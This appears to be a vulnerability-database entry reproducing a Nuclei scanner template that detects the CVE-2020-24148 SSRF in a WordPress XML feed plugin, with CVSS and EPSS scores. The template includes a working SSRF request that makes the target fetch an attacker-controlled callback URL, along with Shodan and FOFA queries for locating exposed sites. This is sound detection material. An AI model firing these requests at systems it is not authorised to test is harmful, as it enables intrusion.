Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-24148
HistoryJul 12, 2021 - 2:24 a.m.

Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery

2021-07-1202:24:50
ProjectDiscovery
github.com
3

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

9.3 High

AI Score

Confidence

High

0.192 Low

EPSS

Percentile

96.3%

WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.

id: CVE-2020-24148

info:
  name: Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery
  author: dwisiswant0
  severity: critical
  description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.
  remediation: |
    Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability.
  reference:
    - https://github.com/dwisiswant0/CVE-2020-24148
    - https://wordpress.org/plugins/import-xml-feed/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24148
    - https://github.com/secwx/research/blob/main/cve/CVE-2020-24148.md
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2020-24148
    cwe-id: CWE-918
    epss-score: 0.1917
    epss-percentile: 0.96258
    cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: mooveagency
    product: import_xml_and_rss_feeds
    framework: wordpress
    shodan-query: http.html:"import-xml-feed"
    fofa-query: body="import-xml-feed"
  tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Import XML feed'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a004830460221008cd4ea6e499ce27cb61170fb04abcb2ba016cc25048d40d1fcd420d0526474fb02210084b6f6f85ad980320e5d237f00e77b65688a93352612bb80811dd782b0f4ffe7:922c64590222798bb761d5b6d8e72950

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

9.3 High

AI Score

Confidence

High

0.192 Low

EPSS

Percentile

96.3%